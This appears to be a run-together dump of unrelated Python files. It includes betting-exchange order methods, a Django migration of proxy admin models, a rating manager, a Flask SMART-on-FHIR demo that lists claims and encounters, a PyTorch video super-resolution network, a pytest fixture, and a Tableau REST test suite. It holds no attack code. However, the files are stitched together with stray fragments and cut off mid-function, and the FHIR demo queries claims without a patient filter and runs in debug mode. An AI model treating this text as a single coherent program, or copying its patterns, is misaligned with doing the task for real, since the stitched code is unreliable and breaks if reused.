"%s%s" % (self.URI, "cancelOrders") (response, response_json, elapsed_time) = self.request(method, params, session) return self.process_response( response_json, resources.CancelOrders, elapsed_time, lightweight ) def update_orders( self, market_id: str = None, instructions: list = None, customer_ref: str = None, session: requests.Session = None, lightweight: bool = None, ) -> Union[dict, resources.UpdateOrders]: """ Update non-exposure changing field. 
:param str market_id: The market id these orders are to be placed on :param list instructions: The update instructions :param str customer_ref: Optional parameter allowing the client to pass a unique string (up to 32 chars) that is used to de-dupe mistaken re-submissions :param requests.session session: Requests session object :param bool lightweight: If True will return dict not a resource :rtype: resources.UpdateOrders """ params = clean_locals(locals()) method = "%s%s" % (self.URI, "updateOrders") (response, response_json, elapsed_time) = self.request(method, params, session) return self.process_response( response_json, resources.UpdateOrders, elapsed_time, lightweight ) def replace_orders( self, market_id: str, instructions: list, customer_ref: str = None, market_version: dict = None, async_: bool = None, session: requests.Session = None, lightweight: bool = None, ) -> Union[dict, resources.ReplaceOrders]: """ This operation is logically a bulk cancel followed by a bulk place. The cancel is completed first then the new orders are placed. :param str market_id: The market id these orders are to be placed on :param list instructions: The number of replace instructions. The limit of replace instructions per request is 60 :param str customer_ref: Optional parameter allowing the client to pass a unique string (up to 32 chars) that is used to de-dupe mistaken re-submissions :param dict market_version: Optional parameter allowing the client to specify which version of the market the orders should be placed on, e.g. "{'version': 123456}" :param bool async_: An optional flag (not setting equates to false) which specifies if the orders should be replaced asynchronously :param requests.session session: Requests session object :param bool lightweight: If True will return dict not a resource :rtype: resources.ReplaceOrders """ params = clean_locals(locals()) method = "%s%s" % (self.URI, "replaceOrders") (response, response_json, elapsed_time) = self.request(method, params, session) return self.process_response( response_json, resources.ReplaceOrders, elapsed_time, lightweight ) DLRSP/django-sp1-10 # Generated by Django 1.11.4 on 2017-08-10 18:43 import user_sessions.models from django.db import migrations class Migration(migrations.Migration): dependencies = [ ("axes", "0003_auto_20160322_0929"), ("oauth2_provider", "0002_auto_20190406_1805"), ("social_django", "0006_partial"), ("otp_totp", "0001_initial"), ("user_sessions", "0003_auto_20161205_1516"), ("two_factor", "0005_auto_20160224_0450"), ("otp_static", "0001_initial"), ("socialprofile", "0001_initial"), ] operations = [ migrations.CreateModel( name="ProxyAccessAttempt", fields=[], options={ "verbose_name": "Monitor: access attempt", "proxy": True, "verbose_name_plural": "Monitor: access attempts", "indexes": [], }, bases=("axes.accessattempt",), ), migrations.CreateModel( name="ProxyAccessLog", fields=[], options={ "verbose_name": "Monitor: access log", "proxy": True, "verbose_name_plural": "Monitor: access logs", "indexes": [], }, bases=("axes.accesslog",), ), migrations.CreateModel( name="ProxyAccessToken", fields=[], options={ "verbose_name": "Token: access token", "proxy": True, "verbose_name_plural": "Token: access tokens", "indexes": [], }, bases=("oauth2_provider.accesstoken",), ), migrations.CreateModel( name="ProxyApplication", fields=[], options={ "verbose_name": "Token: application", "proxy": True, "verbose_name_plural": "Token: applications", "indexes": [], }, bases=("oauth2_provider.application",), ), migrations.CreateModel( 
name="ProxyAssociation", fields=[], options={ "verbose_name": "OAuth: association", "proxy": True, "verbose_name_plural": "OAuth: associations", "indexes": [], }, bases=("social_django.association",), ), migrations.CreateModel( name="ProxyGrant", fields=[], options={ "verbose_name": "Token: grant", "proxy": True, "verbose_name_plural": "Token: grants", "indexes": [], }, bases=("oauth2_provider.grant",), ), migrations.CreateModel( name="ProxyNonce", fields=[], options={ "verbose_name": "OAuth: nonce", "proxy": True, "verbose_name_plural": "OAuth: nonces", "indexes": [], }, bases=("social_django.nonce",), ), migrations.CreateModel( name="ProxyPhoneDevice", fields=[], options={ "verbose_name": "Otp: phone device", "proxy": True, "verbose_name_plural": "Otp: phone devices", "indexes": [], }, bases=("two_factor.phonedevice",), ), migrations.CreateModel( name="ProxyRefreshToken", fields=[], options={ "verbose_name": "Token: refresh token", "proxy": True, "verbose_name_plural": "Token: refresh tokens", "indexes": [], }, bases=("oauth2_provider.refreshtoken",), ), migrations.CreateModel( name="ProxySession", fields=[], options={ "verbose_name": "Monitor: sessione", "proxy": True, "verbose_name_plural": "Monitor: sessioni", "indexes": [], }, bases=("user_sessions.session",), managers=[ ("objects", user_sessions.models.SessionManager()), ], ), migrations.CreateModel( name="ProxyStaticDevice", fields=[], options={ "verbose_name": "Otp: static device", "proxy": True, "verbose_name_plural": "Otp: static devices", "indexes": [], }, bases=("otp_static.staticdevice",), ), migrations.CreateModel( name="ProxyTOTPDevice", fields=[], options={ "verbose_name": "Otp: TOTP device", "proxy": True, "verbose_name_plural": "Otp: TOTP devices", "indexes": [], }, bases=("otp_totp.totpdevice",), ), migrations.CreateModel( name="ProxyUserSocialAuth", fields=[], options={ "verbose_name": "OAuth: user social auth", "proxy": True, "verbose_name_plural": "OAuth: user social auths", "indexes": [], }, bases=("social_django.usersocialauth",), ), ] from django.contrib.contenttypes.models import ContentType from django.db import models from .categories import category_value class OverallRatingManager(models.Manager): def top_rated(self, klass, category=""): cat = category_value(klass, category) if cat is None: cat = "" qs = self.filter( content_type=ContentType.objects.get_for_model(klass), category=cat ) qs = qs.extra( select={ "sortable_rating": "COALESCE(rating, 0)" } ) return qs.order_by("-sortable_rating") 0 # -*- coding: utf-8 -*- import logging from fhirclient import client from fhirclient.models.medication import Medication from fhirclient.models.medicationrequest import MedicationRequest from fhirclient.models.claim import Claim from fhirclient.models.encounter import Encounter from flask import Flask, render_template, json, request, redirect, jsonify, url_for, session # app setup #'scope': 'launch/patient fhirUser openid patient/*.read user/*.read' smart_defaults = { 'app_id': 'HMpLixwYJvGntZhNPXdIgMJVrXeGA7qg', 'app_secret': '', 'api_base': 'https://gcp-hcls-test.apigee.net/v1/r4/carin/', 'redirect_uri': 'http://localhost:8000/fhir-app/', 'scope': 'launch/patient fhirUser openid patient/*.read' } patient_config = { 'Mrs. ': '5b72debb-60d1-49f9-8f3a-8220f894ca95', ' Ritchie586': '22efb1f8-3d1f-4cc6-9dfc-60aabcbe114c', 'Mrs. 
Margery365 Kunde533': 'a28340a7-41e5-47ef-b0c9-e984341fa101', } app = Flask(__name__) def _save_state(state): session['state'] = state def _get_smart(): state = session.get('state') if state: return client.FHIRClient(state=state, save_func=_save_state) else: return client.FHIRClient(settings=smart_defaults, save_func=_save_state) def _logout(): if 'state' in session: smart = _get_smart() smart.reset_patient() def _reset(): if 'state' in session: del session['state'] def _get_prescriptions(smart): bundle = MedicationRequest.where({'patient': smart.patient_id}).perform(smart.server) pres = [be.resource for be in bundle.entry] if bundle is not None and bundle.entry is not None else None if pres is not None and len(pres) > 0: return pres return None def _get_claims(smart): bundle = Claim.where({'patient': smart.patient_id}).perform(smart.server) pres = [be.resource for be in bundle.entry] if bundle is not None and bundle.entry is not None else None if pres is not None and len(pres) > 0: return pres return None def _get_medication_by_ref(ref, smart): #med_id = ref.split("/")[1] #med_id = ref.split("#")[1] #return Medication.read(med_id, smart.server).code med = ref.resolved(Medication) return med.code def _med_name(med): if med.coding: #name = next((coding.display for coding in med.coding if coding.system == 'http://www.nlm.nih.gov/research/umls/rxnorm'), None) name = next((coding.display for coding in med.coding if coding.system == 'http://snomed.info/sct'), None) if name: return name if med.text and med.text: return med.text return "Unnamed Medication(TM)" def _get_med_name(prescription, client=None): if prescription.medicationCodeableConcept is not None: med = prescription.medicationCodeableConcept return _med_name(med) elif prescription.medicationReference is not None and client is not None: #med = _get_medication_by_ref(prescription.medicationReference.reference, client) med = _get_medication_by_ref(prescription.medicationReference, client) return _med_name(med) else: return 'Error: medication not found' def _get_claim_name(claim, client=None): if claim.procedure is not None: med = claim.procedure return med #elif claim.medicationReference is not None and client is not None: # med = _get_medication_by_ref(claim.medicationReference, client) # return _med_name(med) else: return 'Error: medication not found' @app.route('/', methods=["GET","POST"]) def index(): username = '' name = '' smart = _get_smart() user_authenticated = False body = '' if smart.ready and smart.patient is not None: # "ready" may be true but the access token may have expired, making smart.patient = None user_authenticated = True name = smart.human_name(smart.patient.name[0] if smart.patient.name and len(smart.patient.name) > 0 else 'Unknown') if request.method == 'GET': username = name elif request.method == 'POST': username = request.form['username'] patient_id = patient_config[username] print('[ INFO ] Smart Patient_ID: {}'.format(smart.patient_id)) print('[ INFO ] Entered patient_id: {}'.format(patient_id)) ############################################## # CLAIMS ############################################## claims = [] if smart.patient_id == patient_id: #claim_bundle = Claim.where({'patient': smart.patient_id}).perform(smart.server) #print('[ INFO ] Claim JSON before: {}'.format(claim_bundle)) claim_bundle = Claim.where({}).perform(smart.server) claim_json = claim_bundle.as_json()['entry'][0]['resource']['item'] #print('[ INFO ] Claim JSON after: {}'.format(claim_bundle)) #print('[ *********** ] Claim: 
{}'.format(claim_bundle.as_json()['entry'][0])) for claim in claim_json: try: claim_value = claim['net']['value'] claim_desc = claim['productOrService']['text'] claims.append({'claim_desc':claim_desc, 'claim_value':claim_value}) #print('[ *********** ] Claim: {} (${})'.format(claim_desc,claim_value)) except Exception as e: print('[ EXCEPTION ] {}'.format(e)) ############################################## # Encounters ############################################## encounters = [] if smart.patient_id == patient_id: #encounter_bundle = Encounter.where({'patient': smart.patient_id}).perform(smart.server) encounter_bundle = Encounter.where({'patient': patient_id}).perform(smart.server) encounter_json = encounter_bundle.as_json()['entry'] #print('[ INFO ] Encounter JSON after: {}'.format(encounter_json)) #print('[ *********** ] Encounters: {}'.format(encounter_json)) for encounter in encounter_json: try: serviceProvider = encounter['resource']['serviceProvider']['display'] practitioner = encounter['resource']['participant'][0]['individual']['display'] encounter_date = encounter['resource']['period']['start'] encounter_desc = encounter['resource']['type'][0]['text'] encounters.append({'provider':serviceProvider, 'practitioner':practitioner, 'encounter_date':encounter_date, 'encounter_desc':encounter_desc}) except Exception as e: print('[ EXCEPTION ] {}'.format(e)) else: claims = '' encounters = '' auth_url = smart.authorize_url if auth_url is not None: body += """

<p>Please <a href="{0}">authorize</a>.</p>

""".format(auth_url) else: body += """

<p>Running against a no-auth server, nothing to demo here.</p>

""" body += """

<p><a href="/reset">Reset</a></p>

""" return render_template('index.html', user=name, username=username, body=body, user_authenticated=user_authenticated, claims=claims, encounters=encounters) @app.route('/fhir-app/') def callback(): """ OAuth2 callback interception. """ smart = _get_smart() try: smart.handle_callback(request.url) except Exception as e: return """

<h1>Authorization Error</h1><p>{0}</p><p><a href="/">Start over</a></p>

""".format(e) return redirect('/') @app.route('/logout') def logout(): _logout() return redirect('/') @app.route('/reset') def reset(): _reset() return redirect('/') # start the app if '__main__' == __name__: import flaskbeaker flaskbeaker.FlaskBeaker.setup_app(app) logging.basicConfig(level=logging.DEBUG) app.run(debug=True, port=8000) import time import scipy.misc import numpy as np from math import floor, log import torch import torch.nn as nn from torch.nn import init from torch.autograd import Variable from torch.nn.functional import upsample import sys sys.path.append('flownet2-pytorch/networks') try: from submodules import * except ModuleNotFoundError: raise ModuleNotFoundError("flownet2-pytorch not found, did you update the git submodule?") def lp_error(img1, img2, lp=2): return torch.mean((img1 - img2)**lp) # https://en.wikipedia.org/wiki/Peak_signal-to-noise_ratio def psnr(img1, img2): mse = lp_error(img1, img2, 2) if mse == 0: return 100 PIXEL_MAX = 255.0 # getting the noise in dB return 20 * torch.log10(PIXEL_MAX / torch.sqrt(mse)) def rgb2ycbcr(input_tensor): # Conversion from RGB to YCbCr according to # https://en.wikipedia.org/wiki/YCbCr?section=6#JPEG_conversion # Expecting batch of RGB images with values in [0, 255] kr = 0.299 kg = 0.587 kb = 0.114 # Expecting batch of image sequence inputs with values in [0, 255] r = input_tensor[:, 0, :, :, :] g = input_tensor[:, 1, :, :, :] b = input_tensor[:, 2, :, :, :] y = torch.unsqueeze(kr * r + kg * g + kb * b, 1) cb = torch.unsqueeze(128 - (0.1687346 * r) - (0.331264 * g) + (0.5 * b), 1) cr = torch.unsqueeze(128 + (0.5 * r) - (0.418688 * g) - (0.081312 * b), 1) return y, cb, cr def ycbcr2rgb(input_tensor): # Conversion from YCbCr to RGB according to # https://en.wikipedia.org/wiki/YCbCr/16?section=6#JPEG_conversion # Expecting batch of YCbCr images with values in [0, 255] y = input_tensor[:, 0, :, :] cb = input_tensor[:, 1, :, :] cr = input_tensor[:, 2, :, :] r = y + 1.402 * (cr - 128) g = y - 0.344136 * (cb - 128) - 0.714136 * (cr - 128) b = y + 1.772 * (cb - 128) r = torch.unsqueeze(r, 1) g = torch.unsqueeze(g, 1) b = torch.unsqueeze(b, 1) return torch.clamp(torch.cat((r, g, b), 1), 0, 255) def get_grid(batchsize, rows, cols, fp16): # Input is a tensor with shape [batchsize, channels, rows, cols] # Output is tensor with shape [batchsize, 2, rows, cols] # where each col in [:, 1, :, :] and each row in [:, 0, :, :] # is an evenly spaced arithmetic progression from -1.0 to 1.0 hor = torch.linspace(-1.0, 1.0, cols) hor = hor.view(1, 1, 1, cols) hor = hor.expand(batchsize, 1, rows, cols) ver = torch.linspace(-1.0, 1.0, rows) ver = ver.view(1, 1, rows, 1) ver = ver.expand(batchsize, 1, rows, cols) t_grid = torch.cat([hor, ver], 1) if fp16: return Variable(t_grid.half().cuda()) else: return Variable(t_grid.cuda()) def tensorboard_image(name, image, iteration, writer): # tensorboardX expects CHW images out_im = image.data.cpu().numpy().astype('uint8') writer.add_image(name, out_im, iteration) class VSRNet(nn.Module): def __init__(self, frames=3, flownet_path='', fp16=False): super(VSRNet, self).__init__() self.frames = frames self.fp16 = fp16 self.mi = floor(self.frames / 2) self.pooling = nn.AvgPool2d(4, ceil_mode=False) self.upsample = nn.Upsample(scale_factor=4, mode='bilinear') if fp16: #from FlowNetSD16 import FlowNetSD from FlowNetSD import FlowNetSD else: from FlowNetSD import FlowNetSD FlowNetSD_network = FlowNetSD(args=[], batchNorm=False) try: FlowNetSD_weights = torch.load(flownet_path)['state_dict'] except: raise 
IOError('FlowNet weights could not be loaded from %s' % flownet_path) FlowNetSD_network.load_state_dict(FlowNetSD_weights) self.FlowNetSD_network = FlowNetSD_network self.train_grid = None self.val_grid = None self.batchNorm = True self.conv1 = conv(self.batchNorm, 1, 64, kernel_size=9) self.conv2 = conv(self.batchNorm, 64 * self.frames, 32, kernel_size=5) self.conv3 = nn.Conv2d(32, 1, kernel_size=5, stride=1, padding=2, bias=True) self.conv3.weight = torch.nn.init.normal(self.conv3.weight, 0, 0.1) def forward(self, inputs, iteration, writer, im_out=False): batchsize, channels, frames, rows, cols = inputs.size() # inputs are normalized y, cb, cr = rgb2ycbcr(inputs) y /= 255 target = y[:, :, self.mi, :, :] if writer is not None and im_out: out_im = inputs[0, :, self.mi, :, :] # / 255.0 will we need this? tensorboard_image('target', out_im, iteration, writer) out_im = self.pooling(out_im) tensorboard_image('downsampled', out_im, iteration, writer) out_im = self.upsample(out_im.unsqueeze(0)).squeeze(0) tensorboard_image('upsampled', out_im, iteration, writer) # Compute per RGB channel mean across pixels for each image in input batch rgb_mean = inputs.view((batchsize, channels) + (-1, )).float().mean(dim=-1) rgb_mean = rgb_mean.view((batchsize, channels) + (1, 1, 1, )) if self.fp16: rgb_mean = rgb_mean.half() inputs = (inputs - rgb_mean) / 255 if self.training: if self.train_grid is None: self.train_grid = get_grid(batchsize, rows, cols, self.fp16) grid = self.train_grid else: if self.val_grid is None: self.val_grid = get_grid(batchsize, rows, cols, self.fp16) grid = self.val_grid grid.requires_grad = False downsampled_input = self.pooling(cb[:, :, self.mi, :, :]) cb[:, :, self.mi, :, :] = self.upsample(downsampled_input) downsampled_input = self.pooling(cr[:, :, self.mi, :, :]) cr[:, :, self.mi, :, :] = self.upsample(downsampled_input) conv1_out = [] for fr in range(self.frames): downsampled_input = self.pooling(y[:, :, fr, :, :]) y[:, :, fr, :, :] = self.upsample(downsampled_input) if fr == self.mi: conv1_out.append(self.conv1(y[:, :, self.mi, :, :])) else: im1 = inputs[:, :, fr, :, :] im2 = inputs[:, :, self.mi, :, :] im_pair = torch.cat((im2, im1), 1) to_warp = y[:, :, fr, :, :] flow = self.upsample(self.FlowNetSD_network(im_pair)[0]) / 16 flow = torch.cat([flow[:, 0:1, :, :] / ((cols - 1.0) / 2.0), flow[:, 1:2, :, :] / ((rows - 1.0) / 2.0)], 1) warped = torch.nn.functional.grid_sample( input=to_warp, grid=(grid + flow).permute(0, 2, 3, 1), mode='bilinear', padding_mode='border') conv1_out.append(self.conv1(warped)) conv1_out = torch.cat(conv1_out, 1) conv2_out = self.conv2(conv1_out) # Loss must be computed for pixel values in [0, 255] to prevent # divergence in fp16 prediction = torch.nn.functional.sigmoid(self.conv3(conv2_out).float()) loss = torch.nn.functional.mse_loss(prediction.float(), target.float()) if not self.training: # Following [1], remove 12 pixels around border to prevent # convolution edge effects affecting PSNR psnr_metric = psnr(prediction[:, :, 12:, :-12].float() * 255, target[:, :, 12:, :-12].float() * 255) prediction = ycbcr2rgb(torch.cat((prediction * 255, cb[:, :, self.mi, :, :], cr[:, :, self.mi, :, :]), 1)) if writer is not None and im_out: out_im = prediction[0, :, :, :] tensorboard_image('prediction', out_im, iteration, writer) if self.training: return loss else: return loss, psnr_metric # [1] , , , "End-to-End Learning of Video Super-Resolution with Motion Compensation", https://arxiv.org/abs/1707.00471 # -*- coding: utf-8 -*- import pytest @pytest.fixture def 
my_case_instance_json(): return { 'id': 'anId', 'caseDefinitionId': 'aDefinitionId', 'tenantId': 'aTenantId', 'businessKey': 'aBusinessKey', 'active': True } examples/tableau_tools_methods_test_suite.py # -*- coding: utf-8 -*- from tableau_tools.tableau_rest_api import * from tableau_tools import * import time # This is meant to test all relevant functionality of the tableau_tools library. # It does a lot of things that you wouldn't necessarily do just to make sure they work # Other than printing messages before and afte each test, logging of what actually happens going into the log file # rather than to the console. # Allows for testing against multiple versions of Tableau Server. Feel free to use just one servers = { # u"9.0": {u"server": u"http://127.0.0.1", u"username": u"", u"password": u""}, # u"9.1": {u"server": u"http://127.0.0.1", u"username": u"", u"password": u""}, # u"9.2": {u"server": u"http://127.0.0.1", u"username": u"", u"password": u""}, # u"9.3": {u"server": u"http://127.0.0.1", u"username": u"", u"password": u""}, # u'10.0': {u"server": u"http://127.0.0.1", u"username": u"", u"password": u""}, # u'10.1': {u"server": u"http://127.0.0.1", u"username": u"", u"password": u""}, # u"10.2": {u"server": u"http://127.0.0.1", u"username": u"", u"password": u""}, #u"10.3": {u"server": u"http://127.0.0.1", u"username": u"", u"password": u""}, #u"10.4": {u"server": u"http://127.0.0.1", u"username": u"", u"password": u""}, #u"10.5": {u"server": u"http://127.0.0.1", u"username": u"", u"password": u""}, u"10.5 Linux": {u"server": u"http://127.0.0.1", u"username": u"", u"password": u""} } # Configure which tests you want to run in here def run_tests(server_url, username, password): # There are used to ensure that Unicode is being handled correctly. 
They are random but hit a lot of character sets words = [u'ASCII', u'Οὐχὶ ταὐτὰ', u'γιγνώσκειν', u'რეგისტრაცია', u'Международную', u'โฮจิ๋นเรียกทัพทั่วหัวเมืองมา', u'አይተዳደርም።', u'晚飯', u'晩ご飯', u'저녁밥', u'bữa ăn tối', u'Señor'] log_obj = Logger(u'tableau_tools_test.log') # Test Files to Publish twbx_filename = u'test_workbook_excel.twbx' # Replace with your own test file twbx_content_name = u'Test TWBX workbook' # Replace with your own name twb_filename = u'twb_workbook.twb' # Replace with your own file twb_content_name = u'Test Live Connection Workbook' tdsx_filename = u'test_datasource.tdsx' # Replace with your own test file tdsx_content_name = u'Test TDSX Datasource' # Use your own name tds_filename = u'test_live_datasource.tds' # Replace with your test file tds_content_name = u'Test TDS Live Data Source' # End Test Files # Create a default connection default = TableauRestApiConnection26(server_url, username, password, site_content_url=u'default') default.signin() default.enable_logging(log_obj) # Step 1: Creating a test site test_site = create_test_site(default, server_url, username, password, log_obj) # Step 2: Project tests project_tests(test_site, words) # Step 3: Group tests group_tests(test_site, words) # Step 4: Project Permissions tests version = test_site.api_version # very few people still using 9.0-9.1, but permissions works the same without the default permissions if version != u'2.0': project_permissions_tests21(test_site) # Step 5: User Tests user_tests(test_site, words) # Step 6: Publishing Workbook Tests workbooks_test(test_site, twbx_filename, twbx_content_name) # Step 7: Subscription tests #if isinstance(test_site, TableauRestApiConnection23): # subscription_tests(test_site) # Step 8: Publishing Datasource tests #publishing_datasources_test(test_site, tdsx_filename, tdsx_content_name) # These capabilities are only available in later API versions # Step 9: Scheduling tests #if isinstance(test_site, TableauRestApiConnection23): # schedule_test(test_site) # Step 10: Extract Refresh tests def create_test_site(default_site, server_url, username, password, logger): """ :type default_site: TableauRestApiConnection :type server_url: unicode :type username: unicode :type password: unicode :type logger: Logger :rtype: TableauRestApiConnection25 """ print(u"Creating a test site") logger.log(u'Creating test site') # Assign this however you'd like new_site_content_url = u'tableau_tools' new_site_name = u'Test Site 1' new_site_name_to_change_to = u'Test Site - tableau_tools' # Determine if site exists with current name. Delete if it does. 
# Then create new site with the same name and contentUrl try: logger.log(u'Received content_url to delete {}'.format(new_site_content_url)) test_site = TableauRestApiConnection25(server_url, username, password, new_site_content_url) test_site.signin() test_site.enable_logging(logger) logger.log(u'Signed in successfully to {}'.format(new_site_content_url)) site_xml = test_site.query_current_site() logger.log(u'Attempting to delete current site') test_site.delete_current_site() logger.log(u"Deleted site {}".format(new_site_name)) except RecoverableHTTPException as e: logger.log(e.tableau_error_code) logger.log(u"Cannot delete site that does not exist, assuming it already exists and continuing") try: # Create the new site logger.log(u'Now going into the create site') default_site.log(u'Logging with the log function') new_site_id = default_site.create_site(new_site_name, new_site_content_url) logger.log(u'Created new site ' + new_site_id) # This shouldn't happen if the existing check and delete happened earlier, but might as well protect except AlreadyExistsException as e: print(e.msg) print(u"Cannot create new site due to error, exiting") exit() # Once we've created the site, we need to sign into it to do anything else test_site = TableauRestApiConnection25(server_url, username, password, site_content_url=new_site_content_url) test_site.signin() test_site.enable_logging(logger) logger.log(u'Signed in successfully to ' + new_site_content_url) # Update the site name logger.log(u'Updating site name') test_site.update_site(site_name=new_site_name_to_change_to) logger.log(u'Updating everything about site') if isinstance(test_site, TableauRestApiConnection23): # If e-mail subscriptions are disabled for the Server, this comes back with an error #test_site.update_site(content_url=new_site_content_url, admin_mode=u'ContentAndUsers', user_quota=u'30', # storage_quota=u'400', disable_subscriptions=False, state=u'Active', # revision_history_enabled=True, revision_limit=u'15') test_site.update_site(content_url=new_site_content_url, admin_mode=u'ContentAndUsers', user_quota=u'30', storage_quota=u'400', state=u'Active', revision_history_enabled=True, revision_limit=u'15') else: test_site.update_site(content_url=new_site_content_url, admin_mode=u'ContentAndUsers', user_quota=u'30', storage_quota=u'400', disable_subscriptions=False, state=u'Active') logger.log(u"Getting all site_content_urls on the server") all_site_content_urls = test_site.query_all_site_content_urls() logger.log(unicode(all_site_content_urls)) test_site.query_sites() print(u'Finished creating new site') return test_site def project_tests(t_site, project_names): """ :type t_site: TableauRestApiConnection :type project_names: list[unicode] """ print(u'Testing project methods') for project in project_names: t_site.log(u"Creating Project {}".format(project).encode(u'utf8')) t_site.create_project(project, project_desc=u'I am a not a folder, I am project', no_return=True) # Sleep ensures we don't get ahead of the REST API updating with the new projects time.sleep(4) t_site.log(u'Updating first project') t_site.update_project(project_names[0], new_project_name=u'Updated {}'.format(project_names[0]), new_project_description=u'This is only for important people') t_site.log(u"Deleting second and third projects") t_site.delete_projects([project_names[1], project_names[2]]) print(u"Finished testing project methods") def group_tests(t_site, group_names): """ :type t_site: TableauRestApiConnection21 :param group_names: :return: """ print u"Starting group 
tests" for group in group_names: t_site.log(u"Creating Group {}".format(group)) new_group_luid = t_site.create_group(group) # Let all of the groups settle in time.sleep(3) t_site.log(u'Updating first group name') t_site.update_group(group_names[0], u'{} (updated)'.format(group_names[0])) # Delete Groups not introduced until API 2.1 if isinstance(t_site, TableauRestApiConnection21): t_site.log(u'Deleting fourth group') t_site.delete_groups(group_names[3]) t_site.log(u"Querying all the groups") groups_on_site = t_site.query_groups() # Convert the list to a dict {name : luid} groups_dict = t_site.convert_xml_list_to_name_id_dict(groups_on_site) t_site.log(unicode(groups_dict)) print(u'Finished group tests') time.sleep(3) # Let everything update return groups_dict def project_permissions_tests21(t_site): """ :type t_site: TableauRestApiConnection21 :return: """ print(u"Starting Permissions tests") projects = t_site.query_projects() projects_dict = t_site.convert_xml_list_to_name_id_dict(projects) project_names = projects_dict.keys() groups = t_site.query_groups() groups_dict = t_site.convert_xml_list_to_name_id_dict(groups) group_names = groups_dict.keys() # Set permissions for one project t_site.log(u'Querying project called {}'.format(project_names[0])) proj_1 = t_site.query_project(projects_dict[project_names[0]]) t_site.log(u'Setting project to locked permissions') proj_1.lock_permissions() t_site.log(u'Clearing all existing permissions on first project') proj_1.clear_all_permissions() proj_perms_list = [] for group in groups_dict: proj_perms = proj_1.create_project_permissions_object_for_group(groups_dict[group], u'Viewer') proj_perms_list.append(proj_perms) proj_1.set_permissions_by_permissions_obj_list(proj_perms_list) # WB defaults wb_perms_list = [] for group in groups_dict: wb_perms = proj_1.create_workbook_permissions_object_for_group(groups_dict[group], u'Interactor') wb_perms_list.append(wb_perms) t_site.log(u'Setting workbook permissions') proj_1.workbook_defaults.set_permissions_by_permissions_obj_list(wb_perms_list) # DS defaults ds_perms_list = [] for group in groups_dict: ds_perms = proj_1.create_datasource_permissions_object_for_group(groups_dict[group], u'Editor') ds_perms_list.append(ds_perms) t_site.log(u'Setting datasource permissions') proj_1.datasource_defaults.set_permissions_by_permissions_obj_list(ds_perms_list) # Second Project t_site.log(u'Querying project called {}'.format(project_names[5])) proj_2 = t_site.query_project(projects_dict[project_names[5]]) t_site.log(u'Unlocking permissions') proj_2.unlock_permissions() proj_2.clear_all_permissions(clear_defaults=False) # Don't clear workbook or datasource defaults proj_perms = proj_2.create_project_permissions_object_for_group(groups_dict[group_names[6]]) proj_perms.set_all_to_allow() proj_perms.set_capability_to_unspecified(u'Save') t_site.log(u'Setting project permissions for group {}'.format(group_names[6])) proj_2.set_permissions_by_permissions_obj_list([proj_perms, ]) # Clone Permissions from one to another t_site.log(u'Cloning project permissions from {} to {}'.format(project_names[3], project_names[0])) proj_3 = t_site.query_project(projects_dict[project_names[3]]) proj_3.replicate_permissions(proj_1) print u'Finished Permissions tests' def user_tests(t_site, names): """ :type t_site: TableauRestApiConnection :type names: list[unicode] :return: """ print(u'Starting User tests') # Create some fake users to assign to groups new_user_luids = [] for name in names: username = name full_name = name.upper() 
t_site.log(u"Creating User '{}' named '{}'".format(username, full_name)) try: new_user_luid = t_site.add_user(username, full_name, u'Interactor', u'password', username + u'') except InvalidOptionException as e: print(e.msg) raise new_user_luids.append(new_user_luid) # This takes Users x Groups amount of time to complete, can really stretch out the test groups = t_site.query_groups() groups_dict = t_site.convert_xml_list_to_name_id_dict(groups) group_names = groups_dict.keys() # Add all users to first group t_site.log(u"Adding users to group {}".format(group_names[0])) t_site.add_users_to_group(new_user_luids, groups_dict[group_names[0]]) # Add first three users to second gruop t_site.log(u"Adding users to group {}".format(group_names[1])) t_site.add_users_to_group([new_user_luids[0], new_user_luids[1], new_user_luids[3]], group_names[1]) # Remove sixth user from first gruop t_site.log(u'Removing user {} from group {}'.format(new_user_luids[5], group_names[0])) t_site.remove_users_from_group(new_user_luids[5], groups_dict[group_names[0]]) t_site.log(u'Unlicensing the second user') t_site.update_user(new_user_luids[1], site_role=u'Unlicensed') t_site.log(u'Updating second user') t_site.update_user(new_user_luids[1], full_name=u'', password=u'', email=u'') t_site.log(u'Removing the third user') t_site.remove_users_from_site(new_user_luids[2]) # Sleep to let updates happen time.sleep(4) users = t_site.query_users() users_dict = t_site.convert_xml_list_to_name_id_dict(users) t_site.log(unicode(users_dict.keys())) if isinstance(t_site, TableauRestApiConnection25): name_sort = Sort(u'name', u'desc') if isinstance(t_site, TableauRestApiConnection28): role_f = UrlFilter28.create_site_roles_filter([u'Interactor', u'Publisher']) else: role_f = UrlFilter25.create_site_role_filter(u'Interactor') ll_f = UrlFilter25.create_last_login_filter(u'gte', u'2018-01-01T00:00:00:00Z') users = t_site.query_users(sorts=[name_sort, ], site_role_filter=role_f, last_login_filter=ll_f) t_site.log(u'Here are sorted and filtered users') for user in users: t_site.log(user.get(u'name')) print(u'Finished User tests') def workbooks_test(t_site, twbx_filename, twbx_content_name, twb_filename=None, twb_content_name=None): """ :type t_site: TableauRestApiConnection :type twbx_filename: unicode :type twbx_content_name: unicode :type twb_filename: unicode :type twb_content_name: unicode :return: """ print(u"Starting Workbook tests") default_project = t_site.query_project(u'Default') t_site.log(u'Publishing workbook as {}'.format(twbx_content_name)) new_wb_luid = t_site.publish_workbook(twbx_filename, twbx_content_name, default_project, overwrite=True) # Repeat Multiple times to creates some revisions time.sleep(3) new_wb_luid = t_site.publish_workbook(twbx_filename, twbx_content_name, default_project, overwrite=True) time.sleep(3) new_wb_luid = t_site.publish_workbook(twbx_filename, twbx_content_name, default_project, overwrite=True) time.sleep(3) # Publish second one to be deleted new_wb_luid_2 = t_site.publish_workbook(twbx_filename, u"{} - 2".format(twbx_content_name), default_project, overwrite=True) time.sleep(3) projects = t_site.query_projects() projects_dict = t_site.convert_xml_list_to_name_id_dict(projects) projects_list = projects_dict.keys() t_site.log(u'Moving workbook to {} project'.format(projects_list[0])) t_site.update_workbook(new_wb_luid, default_project.luid, new_project_luid=projects_dict[projects_list[0]], show_tabs=True) t_site.log(u"Querying workbook") t_site.query_workbook(new_wb_luid) # Save workbook 
